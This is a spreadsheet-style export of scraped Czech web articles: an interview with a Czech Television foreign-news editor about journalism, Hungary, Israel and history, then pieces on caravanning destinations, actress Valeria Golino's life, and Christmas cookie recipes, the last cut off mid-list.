Jinak je to na tom člověku, on má na starosti nějaký úsek světa, který je jeho zodpovědností a tam si určuje, co zvládne, co nezvládne. A zatímco když jste reportér tady v Česku, tak je na editorovi zahraničních zpráv toho dne, který určuje, co budete ten den dělat. Takže děláte pokaždé něco jiného, často děláte regiony, které nejsou vaši doménou. „Zahraničář“ je v zásadě takový univerzál, nejezdíte někam ven, většinou ty věci děláte z agenturních materiálů, případně získáváte nějaké svoje věci. Často jste odkázáni na práci třetích stran, zatímco zpravodaj si velkou část těch věcí dělá sám. Dá se tedy říct, že momentálně většinou profesního času trávíte v Česku? Je to tak. Dříve jste působil i jako zahraniční zpravodaj, byl jste zástupce vedoucí zahraniční redakce… To jsem pořád. To mě právě zajímalo. A byl jste taky editorem Událostí… Teď už jsem editor zahraniční části Událostí. Jsem zástupce Martina Řezníčka , což je šéf zahraniční rubriky. A v rámci hierarchie České televize se střídám na třech židlích jedním zadkem. Dělám zprávy z části jako reportér, z části dělám editora zahraničních zpráv, to znamená, že mám na starosti to, co ten den bude ze zahraničí v hlavní zpravodajské relaci, a k tomu dělám moderátora pořadu Horizont a pořadu Zóna. A dříve jste ještě psal například pro Reflex nebo Lidové noviny. Na to není čas, píšu, ale píšu knížky. Vaši předci pochází z Maďarska , k čemuž odkazuje i vaše příjmení, vy sám jste tam studoval. Jaký máte k Maďarsku vztah? Poměrně vřelý. Já jsem nejel studovat do Budapešti kvůli tomu, že můj dědeček, jeden z mých prapředků, byl narozený v Maďarsku . Jel jsem tam kvůli tomu, že tam tehdy byla středoevropská univerzita. Kdyby byla bývala někde jinde, tak bych o to stál taky, protože ta škola byla skvělá, než ji Viktor Orbán , můj ex-spolužák, taky absolvent Středoevropské univerzity, nechal vyhnat z politických důvodů z Budapešti . Takže to nebylo tím, ale zároveň to bylo docela fajn, protože třeba moji rodiče, když jeli na svatební cestu, tak jeli za příbuznými do Budapešti . Já jsem se samozřejmě trošičku snažil naučit maďarsky, protože kvůli tomu příjmení mě Maďaři nenechali si myslet, že jsem Čech jenom náhodou s maďarským příjmením, ale Maďarem se být necítím. A kromě maďarštiny, kde máte nějaké základy… No v podstatě už nic. Vím, že jste říkal, že se pořád dokola učíte hebrejsky, ovládáte ruštinu, angličtinu… Jaké ještě jiné jazyky ovládáte? Umím anglicky, francouzsky, rusky, těmi se domluvím slušně, umím číst a psát oběma písmy. To jsou mé hlavní jazyky vedle češtiny a potom jsem schopný se domluvit a velmi pomalu číst a psát hebrejsky a jsem schopný se velice základně domluvit arabsky, ale opravdu velice základně. Jsou to vysoké desítky slov a několik desítek vět. Vy jste vystudoval - mimo toho roku studia na univerzitě v Maďarsku - doktorský titul na Fakultě sociálních věd v Praze v oboru moderní dějiny. Jak je důležité v tomhle oboru se neustále vzdělávat i vzhledem k tomu, že to jsou moderní dějiny, něco, co se pořád děje? Já si myslím, že by se měl vzdělávat celý život každý. Tím, že člověk skončí v nějaké škole, odejde a má titul nebo má maturitu, tím to nekončí. Svět se strašně mění a zvlášť dneska, takže je třeba, aby se člověk udržel takzvaně trošičku „in“. Měl by sledovat, co se děje, měl by číst knihy, měl by se setkávat se zajímavými lidmi, chodit na debaty a tak dále. Taky by měl být pořád otevřený, což samozřejmě není vždycky jednoduché, protože jednak čím je člověk starší, tím je trošičku míň pružný, názorově určitě. Druhá věc je, že máme každý strašně moc práce, strašně moc koníčku a tak dále. No a co se týče novináře, tak tam ten proces nekončí nikdy. Je jedno, jestli děláte politiku, jestli děláte ekonomiku, jestli děláte ekologii, jestli se zajímáte o ženské právo, práva menšin, jestli se zajímáte o blízký východ , Severní Ameriku a tak dále. Neustále se něco děje. A pokud chcete být dobrý novinář, tak prostě musíte pořád dál číst nové věci, dozvídat se nové věci. A mně jako člověku, který vystudoval historii, je tohle to velice blízké. Na základě starších znalostí a jejich prohlubování je člověk trošičku schopný chápat, co se děje teď a zároveň chápat, když se potom dějí nějaké další věci. Ale pro novinařinu si myslím, že je dobré vystudovat každý obor. Pokud vystudujete medicínu a z nějakého důvodu nebudete lékař a stanete se publicistou, tak budete rozumět těm věcem, které se dějí, a že zrovna medicína a zdravotnictví je veliké téma. Jako pro vystudovaného historika, jaké pro vás bylo a pořád je být v centru dění historie? V místě, kde má historie kořeny? Já bych to nepřeceňoval, protože zrovna Blízký východ je jedna z kolíbek naší civilizace, ale zároveň si to člověk nesmí představovat tak, že to tam vypadá jako v muzeu. Jsou to místa, kde lidi žijí. Když pojedete dneska do Gízy na pyramidy, tak zjistíte, že pyramidy jsou úžasné, jsou nádherné, jsou ještě větší, než aspoň já jsem si je představoval, na rozdíl od Sfingy, která je daleko menší, než jsem si ji představoval. Ale že kolem je normální město, je tam klasický egyptský chaos, strašných aut, trochu odpadků, spoustu lidí a tak dále. Nejenom bum a tady je něco, co je staré skoro 5000 let. To samé platí o Izraeli , to samé platí o biblických místech na západním břehu v Gaze a tak dále. To jsou místa, kde lidi žijí. A často lidé bývají zklamaní, platí to hodně pro křesťany, když třeba přijedou do Jeruzaléma , tak čekají, že křížová cesta bude taková, jak jsou zvyklí. Že to bude rovně, bude to někam stoupat, budou tam čísla lichá na jedné straně, sudá na druhé straně a ono to tak není. Zaprvé ta cesta prostě už neplatí, protože to město bylo několikrát zbořené a křížová cesta je hluboko pod troskami, pod těmi základy dnešního Jeruzaléma a hlavně tam žijí lidé, oni tam bydlí. A to je to fascinující, to je živá historie. To mě hrozně baví, akorát člověk musí malinko slevit ze svých středoevropských ambicí a estetiky, kdy kostely jsou všechny nablýskané a zlato se třpytí na andělíčcích. Ne, tam žijí lidi a jsou tam prastará místa jako chrám Svatého hrobu, to je úžasný labyrint a spoustu Evropanů tam přijedou a řeknou, že je to takové začouzené. No... je to začouzené svíčkami, protože je tam lidi zapalují každý den. Vy máte dva syny, jak oni zvládali tu dobu, kdy jste bydleli v Izraeli v Tel Avivu ? Jakou školu navštěvovali, jak to měli s jazykem a jak vypadalo to míšení kultury českých židů s židy v Izraeli ? No, nejenom se židy. Našim klukům bylo pět a tři, když jsme tam přijeli. To znamená, že jeden měl za sebou dva roky školky, neuměl anglicky ani slovo, možná uměl říct „ice cream“ a „mickey mouse“, ale to bylo všechno. A druhému byly tři, neuměl vůbec nic. Jeden šel do školky a druhý šel do školy, protože tam je mezinárodní škola, která začíná už nultým ročníkem, takže šel v pěti a neuměl ani kváknout. Když vám někdo říká dopředu, že děti jsou jako houba a tak dále, to je skvělý, když je to o cizích dětech, ale když se to týká vašich dětí, tak jste prostě vyděšený, protože jak se s nimi ta učitelka domluví, jak ten kluk řekne, že chce čůrat nebo že se mu stýská? Jak mu učitelka něco vysvětlí, když neumí česky? Anglicky umí všichni samozřejmě, ale česky tam neumí nikdo. I přes nějaké prvotní slzičky mladšího kluka, které byly spíš divadlo, tam oba dva zapadli a oba dva byli okamžitě v takovém strašně hezkém, přirozeném „multikulti“, ale jako opravdu skutečném „multikulti“ prostředí. Školu, do které potom chodili oba dva, pomáhal založit Thomas Cook , ten slavný Thomas Cook , je to staré více než 160 let. Je to stará osmanská budova, taková zašlá, ale úžasné místo, je tam drtivá většina Izraelců, půl na půl arabské děti, muslimské a křesťanské a židovské děti a pak je to domíchané lidmi ze zahraničí. Nejlepší kamarádi mého staršího syna byli oba Palestinci, jeden křesťan, druhý muslim, a oni si povídali o všech těch věcech a bylo to geniální. Když jsme se vraceli na prázdniny uprostřed uprchlické krize 2015, 2016, tak oni valili oči, slyšeli ty divné věci "zlých muslimech", kteří se na ně hrnou, a oni nechápali odkud a co, vždyť to byli jejich kamarádi… Takže tyhle věci pro ně byly jako přirozené a v tomhle to bylo skvělé, začátek byl těžký spíš pro nás rodiče, než pro ně dva. Takže to vlastně zvládali dobře... Já si myslím, že to zvládali dobře a že to je dané hlavně těmi školami, školkou a školou. Umějí to s dětmi, kluci tam měli kamarádky z Turecka , z Polska , ze Slovenska , měli i indické kamarády. Bylo to tam namíchané a zároveň tam bylo spoustu místních, ať už židů nebo Arabů. Oba dva teda měli povinnou arabštinu i hebrejštinu, jinak ta škola je v angličtině, ale obě učitelky to braly spíš jako civilizační mise, takže jim spíše vyprávěli o svých kulturách, než aby je úplně učily jazyky. Předpokládám, že je to hodně individuální a záleží na dané rodině, ale jsou v Izraeli nějaké velké rozdíly mezi českým židem a tradicemi, které se drží tady v Česku oproti těm v Izraeli ? To nejsou, kalendář židovský je univerzální, ten je daný, jsou drobné zvyklosti v čase konání svátku, třeba v tom, kolik dní to trvá, někdy je to o jeden den kratší nebo delší, ale jinak je to stejné. Způsob dodržování svátků je stejný. V Izraeli dneska většina židů jsou Sefardští židé, což je drobně odlišná tradice, takže v některých věcech se to malinko liší, ale ne zásadně. Hlavní rozdíl je v tom, že tato země, ze které vy i já jsme, je země křesťanská, to znamená, že se řídí podle v uvozovkách křesťanského kalendáře, který dneska už má jenom dva svátky, a to jsou Velikonoce a Vánoce. Zatímco Izrael je židovsko-arabská země a řídí se tam hlavně kalendářem židovským a plus jsou zde svátky pro muslimy a křesťany. Křesťanské svátky taky nejsou univerzální, protože katolíci to mají jinak, než to mají ortodoxní křesťané na východě. Co tím chci říct, je, že dodržovat židovské svátky v Izraeli je daleko jednodušší, protože ta země se tím řídí. Oni vám to připomenou, přijde na to čas a ta země tím žije. Je to stejné, jako když se v Česku blíží Vánoce? V zásadě ano, akorát v Česku Vánoce dodržují spíš kulturně než nábožensky, zatímco tam ta náboženská tradice je furt stejná. Když je třeba Pesach a nesmí se konzumovat nic kvašeného, což je daleko víc věcí, než si člověk běžně uvědomuje, tak to prostě nekoupíte. Koupíte to v arabském obchodě, nekoupíte to v supermarketu. Regály s těmito potravinami jsou zavřené, tam je nějaká plachta přesto a nekoupíte to. Dokonce je to zablokované přímo na kase. To u nás takovéto omezení udělat nejdou. U nás by to byl útok na osobní svobodu, tam je to zcela běžná věc. Pokud si chcete koupit třeba chleba nebo pivo , tak skočíte do arabského obchodu, kde to není povinné. Jaká jsou vaše doporučení, co by měl vědět každý člověk, který chce navštívit blízký východ konkrétně Izrael nebo Egypt ? Je něco, co by člověk měl vědět, než tam vyrazí? Já si myslím, že nemusí vědět vůbec nic, že se na místě všechny věci dozví. Myslím si, že je velmi nepravděpodobné, aby člověk, který jede z Česka , neznal nějaké základní věci, ať už o Egyptě , nebo o Izraeli nebo jakékoli jiné zemi. Když pojede člověk, který neví jak a co, tak pojede určitě s někým, kdo bude vědět. Takže je to pro turisty jako přívětivá oblast? Určitě ano, teď momentálně je to samozřejmě velice komplikované, ale jinak ano, Egypt je velice přívětivá oblast a Izrael je nesmírně zajímavá země, která nahrává hodně individuální turistice, která v Egyptě je trošku složitější. Ale jestli si člověk netroufá na to se tam pohybovat sám, ne z bezpečnostní důvodů, ale spíš z organizační důvodů, tak vždycky najde nějakou cestovku tady nebo tam, která mu pomůže. A jak jste na tom momentálně vy sám s cestováním mimo práci? Dovolené v zahraničí nebo tak, stíháte to nebo máte na to chuť? Mám na to chuť, pořád cestování považuji za jeden z nejdůležitějších způsobů sebevzdělávání a poznávání. To si myslím, že je klíčová věc. Teď jsem se vrátil z poměrně velkého hezkého výletu z Jihoafrické republiky , kde jsme se potápěli a cestovali, a bylo to skvělé. Zase jsem se dozvěděl hodně věcí o zemi, o které člověk hodně slýchal, ale nemá na ní úplně moc názor. Tak jsem rád, že jsem tam mohl být. Jediný drobný problém, jediná drobná překážka mému cestování je to samé, co má každý. Je to čas a jsou to peníze. Na závěr, vy máte v popisu dnešní přednášky, že se posluchač dozví, co dostala Kleopatra od svého manžela… Já vám to prozradím. Když Marcus Antonius , tehdy jako jeden z dvou hlavních vládců, respektive oni byli tři, ale tehdy už vládli Římské říše jenom on a Octavian. Poté, co se pomstil a zničil tu koalici, která zavraždila generála Césara, přesídlil do Alexandrie . Tam to nějak zajiskřilo s tehdejší první dámou Egypta Kleopatrou a měli se vzít. A Marcus Antonius to, že z tehdejší provincie Judea , což bylo Izraelské království, nechal vykousnout oblast Gazy a tu Gazu věnoval Egyptu . Takže do věna dostala Gazu. To nevydrželo dlouho, protože do tří let se Octavian rozhodl, že chce vládnout té říši sám a oba dva nakonec donutil k sebevraždě a Gaza se vrátila nazpátek do Judeje . To ale nic nemění na tom, že Gaza byla jednou překrásným důkazem velké lásky mezi Římem a mezi Egyptem . Sdílet Spolek MUNIE jako každý rok pořádala Ples studentů Masarykovy univerzity . Letos zvolil téma „Kde domov můj“, tedy kroje a folklór. Návštěvníci si tak 6.... dnes v 10:30 Sto padesát pět – číslo záchranné služby zná téměř každý. Stačí zavolat, nahlásit problém a sanitka by měla co nejrychleji dorazit na pomoc. Jenže mnoho lidí... 3. prosince 2024 • 19:29 3. prosince 2024 • 17:52 O nás Stisk online je studentský multimediální zpravodajský deník tvořený studenty Katedry mediálních studií a žurnalistiky z Fakulty sociálních studií Masarykovy univerzity Brno v rámci studia jako cvičné médium. Stisk vznikl jako cvičné médium pro studenty už v roce 1997, kdy byl jedním z prvních internetových časopisů v České republice . Na portálu zájemci najdou studentský deník Stisk Online, Rádio Stisk, TV Stisk a také výstupy některých dalších žurnalistických kurzů (s přesahem na sociální sítě). Cílem multimediální dílny je simulace redakčního prostředí, každý student si tak může vyzkoušet všechny základní role při výrobě online zpravodajského či publicistického obsahu i související působení na sociálních sítích a připravit se tak na praxi v různých typech médií. twitter facebook instagram youtube Tiráž Tiskové zprávy a náměty pro tvorbu žurnalistických materiálů pro Online Stisk, Rádio Stisk a TV Stisk zasílejte pouze na e-mail: Všechny žurnalistické materiály jsou zveřejněny podle stejných pravidel jako na kterémkoliv jiném zpravodajském serveru nebo například v novinách, rozhlasovém nebo televizním zpravodajství. Mazání už zveřejněných žurnalistických příspěvků (ani jejich částí) v jakékoli formě není možné nyní ani v budoucnu. Adresa Katedra mediálních studií a žurnalistiky, Fakulta sociálních studií MU, Autor: Jan Winkler Autor person Jan Winkler Rubrika transition_slide Domácí</t>
  </si>
  <si>
    <t>1330</t>
  </si>
  <si>
    <t>20241201_102_3477163503_3eeee92815b00d7548e5.html</t>
  </si>
  <si>
    <t>3eeee92815b00d7548e5</t>
  </si>
  <si>
    <t>Neobvyklé destinace pro karavanisty, které vás okouzlí svou jedinečností</t>
  </si>
  <si>
    <t>Neobvyklé destinace pro karavanisty, které vás okouzlí svou jedinečností 01.12.2024 Redakce Oblast karavaningu se neustále vyvíjí a nabízí stále více možností, jak objevovat nádherná místa. Mnoho karavanistů se zaměřuje na známé turistické cíle, ale pokud hledáte něco opravdu unikátního, existuje celá řada zajímavých destinací, které byste měli zvážit. Od neobvyklých přírodních úkazů po malebné městečka – tento článek vám přináší tipy na místy, která uchvátí vaše srdce i mysl. Pohádkové vesnice na okrajích Evropy V Evropě se nachází několik malebných vesniček, které jsou ideální pro karavanisty toužící po poklidu a inspiraci. Například norské Lofoty , které jsou známé svými dramatickými horskými štíty a rozpraskanými fjordy, lákají návštěvníky nejen dechberoucími výhledy, ale také jedinečnou kulturu a tradicí rybářství. V těchto malých městečkách najdete tradiční dřevěné domky a živou atmosféru, jež vás přenese zpět do doby, kdy byla příroda hlavní součástí každodenního života. Zajímavým faktem je, že ve skandinávských zemích je karavaning oblíbený natolik, že existují speciální terénní trasy určené pouze pro obytná vozidla. Takto si mohou karavanisté vychutnat nejen zastávky na tradičních místech, ale i možnost objevovat méně známé a odlehlé kouty přírody, které by jinak zůstaly návštěvníkům skryté. Pokud se rozhodnete pro túru k těmto krásám, nezapomeňte si vzít dostatečné zásoby na cestu, jelikož v takových oblastech občerstvení nemusí být k dispozici. Kulturní zážitky v srdečných městech Dalšími fascinujícími destinacemi jsou menší města, kde můžete prozkoumat místní kulturu a tradice. Například Avila ve Španělsku , známá svými impozantními středověkými hradbami, nabízí karavanistům unikátní příležitost spojit se s historií a místním způsobem života. Historie a architektura těchto měst vás vtáhnou do minulosti a umožní vám lépe porozumět místní kultuře. V Avile můžete také navštívit místní trhy, kde uvidíte širokou škálu regionálních produktů, od sušených šunek po místní vína . Tyto trhy nabízejí nejen příležitost nakoupit, ale také si vychutnat atmosféru plnou rušného jednání a smíchu. Pro karavanisty je to skvělá příležitost, jak se setkat s místními obyvateli a získat tak bližší pohled na život v tomto historickém městě. Nádherné přírodní scenérie, které vás ohromí Kromě okouzlujících městeček a vesnic, nabízí karavaning také možnost objevování přírodních krás. Například nedotčené pláže v Řecku nebo divoké lesy v českých horách lákají k dobrodružství. Když se rozhodnete strávit noc na odlehlém místě s výhledem na moře nebo na úpatí hory, zaručeně zažijete jedinečné chvilky, které vám zůstanou v paměti po celý život. Na těchto místech se můžete věnovat různým aktivitám, jako je cyklistika, pěší turistika nebo prostě jen odpočinek. V přírodě si totiž každý jeden okamžik zaslouží být prožit naplno. Navíc, být obklopen majestátními scenériemi je skvělým způsobem, jak načerpat energii a inspiraci pro další cesty. Zážitky, které vám tyto netradiční destinace přinesou, si můžete snadno zaznamenat v deníku nebo sdílet s přáteli. Karavaning je o objevování a prožívání nových příběhů, které se ukrývají na každém kroku. Ať už jste zkušený karavanista nebo nováček v této oblasti, zaměřte se na tyto unikátní místa, která dodají vašim cestám nový rozměr. Autor: Redakce</t>
  </si>
  <si>
    <t>20241201_103_3477148504_4291d668d735431faee9.html</t>
  </si>
  <si>
    <t>4291d668d735431faee9</t>
  </si>
  <si>
    <t>Valeria Golino: Ve Žhavých výstřelech se proslavila vajíčky, Pretty Woman jí vyfoukla Roberts</t>
  </si>
  <si>
    <t>Valeria Golino: Ve Žhavých výstřelech se proslavila vajíčky, Pretty Woman jí vyfoukla Roberts Valeria Golino, herečka s bohatými kadeřemi, nezaměnitelným chraplavým hlasem a hlubokýma očima, hrála po boku Toma Cruise , Dustina Hoffmana i Charlieho Sheena . Dnes se věnuje mimo jiné i režii. Budoucí filmová kráska spatřila světlo světa dne 22. října 1965 v jihoitalské Neapoli . Otec byl germanista a matka Lalla, malířka, pocházela z Řecka . Jedna z babiček pak měla dokonce egyptsko-francouzské kořeny. Valeria vyrůstala v umělecké domácnosti. Rodiče se ale poměrně brzy rozvedli a ona od té doby žila střídavě s otcem v Sorrentu u Neapole a střídavě s matkou v řeckých Aténách. Když byla ještě malá holčička, maminka ji často brávala do kina, a podnítila tak její zájem o filmové umění. Navzdory této skutečnosti ale netoužila stát se herečkou, snila o povolání kardioložky. Ve věku jedenácti let ji postihla velmi nemilá událost. Lékaři jí diagnostikovali těžkou skoliózu. V Chicagu proto podstoupila speciální operaci, kdy jí byla do zad na několik let implantována ocelová tyč. V Americe zůstala v péči chirurgů dlouhých šest měsíců a naučila se mluvit anglicky. Dnes tak dokáže hovořit italsky, řecky, německy a právě anglicky. Modelkou být ve skutečnosti nechtěla Ve čtrnácti letech začala v Aténách pracovat jako modelka. Hrála v televizních reklamách na pivo , parfémy a kosmetiku, předváděla plavky i džíny. Neomezila se pouze na Atény, pracovala i v Londýně , Miláně či Los Angeles . Její filmová kariéra začala zcela náhodou. Jednoho dne jejímu strýci novináři Enzu Golinovi zavolala režisérka Lina Wertmüller, která právě hledala mladou dívku pro svůj film, přesvědčila jej, aby přemluvil svoji krásnou neteř a přivedl ji k ní na návštěvu. Slovo dalo slovo, obě ženy se setkaly a Valeria byla obsazena do komedie s předlouhým názvem Scherzo del destino in agguato dietro l'angolo come un brigante da strada. Navzdory výhradám rodičů a režisérčině náročnosti se jí tato první filmová zkušenost natolik zalíbila, že se u herectví již rozhodla zůstat. Opustila střední školu, vzdala se modelingu, který ji nikdy doopravdy nezajímal, a začala studovat dikci a přednes. Zpočátku se soustředila na menší a náročnější projekty. Hrála v nezávislých filmech. První hlavní roli získala v roce 1985 ve filmu svého tehdejšího partnera Petera del Monte s názvem Piccoli fuochi a hned za ni obdržela Zlatý glóbus. Radost z úspěchu ale záhy zkalila autonehoda, při které se pohnula kovová tyč v zádech a herečka musela opětovně podstoupit operaci. Pět následujících měsíců strávila na lůžku. Její hvězdná role přišla v následujícím roce, kdy si zahrála život milující uklízečku, která se zamiluje do dvou různých mužů. Za snímek Příběh lásky obdržela na Benátském filmovém festivalu cenu pro nejlepší herečku. Jejími dalšími projekty byly opět nezávislé filmy. Do Ameriky odešla za hlasem svého srdce V roce 1988 ale v hereččině životě nastal zlom. Seznámila se s hercem Beniciem del Torem a odstěhovala se za ním do Los Angeles . Její hollywoodské období začalo dobrodružným filmem Big Top Pee-wee, kde hrála se svým snoubencem. Ve stejném roce získala roli Susanny, přítelkyně Toma Cruise , ve slavném dramatu Rain Man. Snímek měl obrovský úspěch a získal celou řadu ocenění. Dodnes je jediným filmem, který získal Zlatého Medvěda a Oscara zároveň. Valerii přicházely další nabídky, zahrála si kupříkladu v Jarních vodách po boku Timothyho Huttona a Nastassji Kinski . Zúčastnila se také konkurzu na hlavní roli ve filmu Pretty Woman, postupila až do posledního kola, kdy se výběr zúžil již pouze na ni a Julii Roberts . Na žádost režiséra chodily po stejné chodbě, ve stejném oblečení a stejně nalíčené. Valeria ale po letech přiznala, že jakmile svoji soupeřku uviděla, bylo jí jasné, že nemá šanci. Ostatně Julia Roberts jí to dala nepokrytě najevo. Charlie Sheen na jejím těle smažil vajíčka V roce 1991 pak Valeria Golino přijala roli v akční komedii Žhavé výstřely. Film s Charliem Sheenem v hlavní roli je skvělou parodií na řadu akčních filmů, především Top Gun. Valeria se coby psychiatrička Ramada Thompson proslavila scénami s olivou v pupíku a se smaženými vajíčky. O dva roky později si svoji úlohu zopakovala ještě ve filmu Žhavé výstřely 2. V druhé polovině devadesátých let natáčela filmy jak v Itálii , tak v Americe . Se svojí blízkou kamarádkou Salmou Hayek si zahrála v životopisném snímku Frida. V roce 2004 získala vedlejší roli ve francouzském kriminálním dramatu Válka policajtů. V roce 2008 se pak objevila v rovněž francouzské komedii Cash. Z francouzské produkce pochází i romantické drama Portrét dívky v plamenech, ve kterém si Valeria Golino zahrála v roce 2019. V letošním roce by se pak měla objevit v italské komedii Breve storia d'amore. V roce 2013 si poprvé vyzkoušela roli režisérky a natočila film Miele, zaměřený na problematické téma eutanazie a získala za něj Stříbrnou stuhu pro nejlepší začínající režisérku. Podruhé si na druhou stranu kamery stoupla v roce 2018, kdy pod její taktovkou vzniklo drama Euforie. Děti nemá, současný partner by ale mohl být její syn Valeria Golino je dodnes svobodná a nemá děti. Po rozchodu s Beniciem del Torem začala v roce 1993 chodit s Fabriziem Bentivogliem. I tento vztah ale k roku 2001 skončil. V letech 2005 až 2016 se objevovala po boku italského herce Riccarda Scamarcia. Mluvilo se již dokonce o svatbě, ale pár se nakonec rozešel. „Rozešla jsem se s Riccardem a teď se učím být sama. Není to jednoduché pro někoho, kdo dlouho žije a sní jako pár,“ řekla herečka tisku poté, co se rozpad vztahu dostal na veřejnost. Přiznala rovněž, že by si bývala moc přála s tímto partnerem založit rodinu. Zklamání z konce lásky pak označila za to vůbec největší ve svém dosavadním životě. K Riccardovi ale nechovala zášť a zůstali nadále přáteli. Od roku 2018 je jejím přítelem právník Fabio Palombi, který je o neuvěřitelných dvacet čtyři let mladší než ona. „Šest let jsem s Fabiem Polombim, který nenatáčí filmy a je mladší než já. U ostatních si nemyslím, že je to problém. Pro mě také ne, zatím ne,“ řekla letos herečka v jednom z rozhovorů o svém současném partnerovi. Valerie Golino do dnešních dnů patří k nejoblíbenějším herečkám doma v Itálii a zároveň k nejznámějším italským hvězdám ve světě. Zdroje: Valeria Golino | Biografie | ČSFD.cz Valeria Golinová – Wikipedie Valeria Golino - Wikipedia Valeria Golino , chi è: le curiosità e la vita privata dell'attrice</t>
  </si>
  <si>
    <t>428750</t>
  </si>
  <si>
    <t>20241201_104_3477136749_3d213dfae92610e06b8a.html</t>
  </si>
  <si>
    <t>3d213dfae92610e06b8a</t>
  </si>
  <si>
    <t>Měkké perníčky nebo vláčné linecké? 35 receptů na cukroví, které nesmí o Vánocích chybět</t>
  </si>
  <si>
    <t>Měkké perníčky nebo vláčné linecké? 35 receptů na cukroví, které nesmí o Vánocích chybět Vánoce se blíží a s nimi i čas na pečení cukroví, které na svátečním stole nesmí chybět. Máte rádi klasické linecké, měkké perníčky, nebo raději experimentujete s moderními recepty? Připravili jsme pro vás výběr 35 druhů cukroví – pečeného i nepečeného, tradičního i netradičního, s alkoholem i bez. Vyberte si z našich tipů a vykouzlete cukroví, které potěší celou rodinu. Co v článku najdete Pečené cukroví Nepečené vánoční cukroví Pečené cukroví Prověřený recept na linecké nebo perníčky, které jsou hned měkké? Pečení cukroví nemusí být dřina . S našimi recepty se vám zaručeně povede, navíc bude výsledek určitě luxusní. Linecké cukroví Klasika všech klasik, která o žádných Vánocích nemůže chybět. Linecké těsto v tomto receptu nemusíte dávat odležet, navíc je cukroví vláčné hned druhý den po upečení. Čas přípravy: 1 hod Obtížnost: Snadný Low carb linecké cukroví Low carb linecké cukroví se hodí pro všechny, kteří mají raději zdravější alternativy klasického cukroví. Toto linecké je nejen zdravé a bezlepkové, ale také neobsahuje ani gram cukru a chutná naprosto skvěle. Low carb linecké cukroví Čas přípravy: 1 hod 30 min Obtížnost: Snadný Měkké linecké cukroví Linecké patří mezi nejoblíbenější druh cukroví, bez kterého se Vánoce prostě neobejdou. Podle našeho receptu vám bude na přípravu stačit pouze jedno odpoledne, těsto totiž není potřeba dávat odležet a linecké cukroví z něj můžete rovnou upéct. Navíc bude výborně vláčné již druhý den po upečení. Měkké linecké cukroví Perníčky Medové perníčky, které jsou hned měkké? Anebo raději zdravější varianty, po kterých se nebudete muset cítit tak provinile? Nemusíte říkat dvakrát! Čas přípravy: 1 hod 30 min Obtížnost: Snadný Perníčky ze špaldové mouky Perníčky patří mezi klasické vánoční cukroví, které by nemělo chybět u žádného štědrovečerního stolu. Zkuste letos pro změnu jejich alternativu z celozrnné špaldové mouky, která dodá těstu příjemnou oříškovou chuť. Perníčky ze špaldové mouky Čas přípravy: 1 hod Obtížnost: Snadný Měkké perníčky s polevou Tyto měkké perníčky s polevou můžete jíst hned po upečení. Vyzkoušejte náš vánoční recept a perníčky se vám budou krásně rozplývat na jazyku. Perníkové těsto patří mezi tužší, doporučujeme použít pro přípravu kuchyňského robota. Pokud však tohoto parťáka v kuchyni ještě nemáte, vystačíte si i s obyčejnou mísou a vařečkou. Měkké perníčky s polevou Čas přípravy: 1 hod Obtížnost: Snadný Perníčky bez cukru a mouky Recept na perníčky bez cukru a mouky jistě potěší všechny příznivce nízkosacharidového stravování a také celiaky. Jejich základem jsou mandle a připravíte je velmi snadno, vyzkoušejte tedy odlehčenou verzi tohoto oblíbeného vánočního cukroví a pochutnejte si zdravě. Perníčky bez cukru a mouky Vanilkové rohlíčky Rohlíčky jsou další klasické české cukroví, které byste neměli na Vánoce opomenout. Vyberete si klasiku, nebo s lískovými ořechy? Pro ty, co nemohou oříšky, máme i variantu bez nich . Čas přípravy: 1 hod Obtížnost: Snadný Vanilkové rohlíčky Vanilkové rohlíčky jsou klasikou mezi českým vánočním cukrovím, které by u štědrovečerního stolu určitě nemělo chybět. Na náš recept jsme použili vlašské ořechy, ale klidně je můžete mixovat i s lískovými oříšky či mandlemi pro jemnější chuť. Vanilkové rohlíčky Čas přípravy: 45 min Obtížnost: Snadný Vanilkové rohlíčky bez ořechů Vanilkové rohlíčky bez ořechů budete mít hotové během chvilky a pochutnají si na nich i ti, kteří nemohou z nejrůznějších důvodů jíst ořechy. Rohlíčky jsou naprosto vynikající a díky našemu videoreceptu je zvládne připravit opravdu každý. Vanilkové rohlíčky bez ořechů Čas přípravy: 1 hod 30 min Obtížnost: Snadný Vanilkové rohlíčky z lískových ořechů Vanilkové rohlíčky patří mezi nejoblíbenější vánoční cukroví. A není divu! Křehké rohlíčky chutnají po oříšcích, voní po vanilkovém cukru a neskutečně se rozplývají na jazyku. Příprava je velmi jednoduchá, vhodná i pro naprosté začátečníky. Vanilkové rohlíčky z lískových ořechů Pracny Ořechové pracny patří mezi tradiční cukroví našich babiček. Medvědí tlapky, jak se také někdy nazývají, zmizí rychlostí blesku. Zkuste je podle našeho prověřeného receptu. Čas přípravy: 1 hod Obtížnost: Snadný Pracny Ořechové pracny nebo také medvědí tlapky patří mezi tradiční české cukroví našich babiček. Jejich příprava je snadná, jen k pečení potřebujeme plechové nebo silikonové vyklápěcí formičky. Pracny Masarykovo cukroví Cukroví, na kterém si pochutnával sám prezident? S touto tradiční dobrotou s lískovými ořechy letos můžete zavzpomínat na Vánoce za první republiky i vy. Čas přípravy: 1 hod 20 min Obtížnost: Snadný Masarykovo cukroví s lískovými oříšky Masarykovo cukroví s lískovými oříšky (občas označováno také jako Masarykovy knoflíky) patří mezi tradiční druhy vánočního cukroví. Jméno mu propůjčil první československý prezident Tomáš Garrigue Masaryk, který si na tomto druhu cukroví prý nesmírně rád pochutnával. A připravit si tuto sladkou dobrotu můžete i vy podle našeho receptu. Masarykovo cukroví s lískovými oříšky Plněné ořechy Ořechy plněné jemným krémem (někdy také nazývané slepované) patří k typicky oblíbenému cukroví. Taky není divu. Zvládne je i začátečník a do Vánoc jen málokdy vydrží nesnězené. Udělejte si radši dvojitou dávku. Čas přípravy: 1 hod Obtížnost: Snadný Ořechy plněné jemným krémem Ořechy plněné jemným krémem patří mezi typické vánoční cukroví, které má rád snad každý. Výhodou našeho receptu je, že ho zvládne připravit i úplný začátečník. Tak si je pojďte s námi upéct, je to opravdu velmi jednoduché. Ořechy plněné jemným krémem Podvodnice Křehké a nadýchané podvodnice rozvoní po vanilce celý váš domov . Rozhodně je nezavrhujte, jejich příprava je poměrně rychlá a snadná a během chvilky máte na stole nadýchané cukroví. Čas přípravy: 45 min Obtížnost: Snadný Vanilkové podvodnice Křehké a nadýchané podvodnice jsou vánoční cukroví vonící po vanilce. Ještě za tepla se totiž obalují ve vanilkovém cukru. Jejich příprava je navíc velmi jednoduchá a jistě ji zvládne každý. Vanilkové podvodnice Išelské cukroví Išlské 